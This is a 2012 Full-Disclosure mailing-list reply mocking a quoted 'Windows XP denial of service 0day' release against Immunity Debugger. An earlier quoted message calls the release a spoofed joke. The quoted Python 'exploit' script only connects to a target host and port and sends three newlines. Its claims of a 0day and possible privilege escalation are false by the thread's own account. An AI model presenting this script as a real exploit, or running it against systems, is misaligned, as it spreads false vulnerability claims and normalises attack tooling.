
Re: [Full-disclosure] Windows XP denial of service 0day found in CTF exercise

This is awesome!

It's almost as awesome as a privilege escalation from root to root that
works only in BackTrack.


On Tue, Apr 17, 2012 at 10:07,  <adam@xxxxxxxxxxxxxxxxxxxx> wrote:
> Guys, this is a fake release, someone spoofed my email and sent this out
> as a joke to mock the wicd release from last week. Please note that if you
> click on the links, there is nothing there concerning this.
>> On 04/17/2012 02:48 AM, Adam Behnke wrote:
>>> Immunity Debugger Remote Denial of Service 0Day Tested against
>>> version 1.76 and 1.80 on Windows XP distributions
>>> Has not been tested for potential privilege escalation vectors.
>>> We first wrote about Immunity Debugger here:
>>> http://news.infosecinstitute.com/general/release-immunity-debugger-v1-80/
>>> Discovered by a student who wishes to remain anonymous in the
>>> course CTF. This 0day exploit for Windows was discovered by a
>>> student in the InfoSec Institute Ethical Hacking class, during an
>>> evening CTF exercise. The student wishes to remain anonymous; he
>>> has contributed a python version of the 0day. A patch that can be
>>> applied to Windows has not been made available. You can find a
>>> python version of the exploit to copy and paste here:
>>> #!/usr/bin/python
>>> # Windows XP denial of service 0day exploit discovered on 4.9.12 by
>>> # InfoSec Institute student
>>> # For full write up and description go to
>>> # http://www.infosecinstitute.com/courses/ethical_hacking_training.html
>>> import sys
>>> import os
>>> import time
>>> import getopt
>>> import socket
>>>
>>> class Error(Exception):
>>>     def __init__(self, error):
>>>         self.errorStr = error
>>>
>>>     def __str__(self):
>>>         return repr(self.errorStr)
>>>
>>> class Exploit():
>>>     def __init__(self, targetHost, targetPort):
>>>         self.targetHost = targetHost
>>>         self.targetPort = targetPort
>>>
>>>     def exploit(self, targetHost, targetPort):
>>>         # Validate the address and open a TCP connection to the target.
>>>         try:
>>>             socket.inet_aton(targetHost)
>>>             s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
>>>             s.connect((targetHost, targetPort))
>>>         except socket.error:
>>>             raise Error("Unable to exploit (Connect failed.)")
>>>
>>>         # exploit: the entire payload is three newlines on the open
>>>         # connection (send(), not sendto(), since the socket is connected)
>>>         try:
>>>             s.send("\n\n\n")
>>>         except socket.error:
>>>             raise Error("Unable to exploit (Exploit failed.)")
>>>
>>> def usage():
>>>     print "[!] Usage:"
>>>     print "      ( -h, --help ):"
>>>     print "            Print this message."
>>>     print "      ( --targetHost= ): Target host."
>>>     print "            --targetHost="
>>>     print "      ( --targetPort= ): Target port."
>>>     print "            --targetPort=8888"
>>>
>>> def main():
>>>     print "[$] Windows XP 0Day"
>>>     try:
>>>         opts, args = getopt.getopt(sys.argv[1:], "h",
>>>                                    ["help", "targetHost=", "targetPort="])
>>>     except getopt.GetoptError, err:
>>>         # Print help information and exit:
>>>         print '[!] Parameter error:' + str(err)  # e.g. "option -a not recognized"
>>>         usage()
>>>         sys.exit(0)
>>>
>>>     targetHost = None
>>>     targetPort = None
>>>
>>>     for opt, arg in opts:
>>>         if opt in ("-h", "--help"):
>>>             usage()
>>>             sys.exit(0)
>>>         elif opt == "--targetHost":
>>>             targetHost = arg
>>>         elif opt == "--targetPort":
>>>             targetPort = arg
>>>         else:
>>>             # I would be assuming to say we'll never get here.
>>>             print "[!] Parameter error."
>>>             usage()
>>>             sys.exit(0)
>>>
>>>     if not targetHost:
>>>         print "[!] Parameter error: targetHost not set."
>>>         usage()
>>>         sys.exit(0)
>>>
>>>     if not targetPort:
>>>         print "[!] Parameter error: targetPort not set."
>>>         usage()
>>>         sys.exit(0)
>>>
>>>     exploit = Exploit(targetHost, targetPort)
>>>
>>>     print "[*] Attempting to exploit:"
>>>     try:
>>>         exploit.exploit(targetHost, int(targetPort))
>>>     except Error as error:
>>>         print "[!] Exploit Error: %s" % (error.errorStr)
>>>         sys.exit(0)
>>>
>>>     print "[*] Exploit appears to have worked."
>>>
>>> # Standard boilerplate to call the main() function to begin
>>> # the program.
>>> if __name__ == '__main__':
>>>     main()
>>> _______________________________________________
>>> Full-Disclosure - We believe in it.
>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>> Hosted and sponsored by Secunia - http://secunia.com/
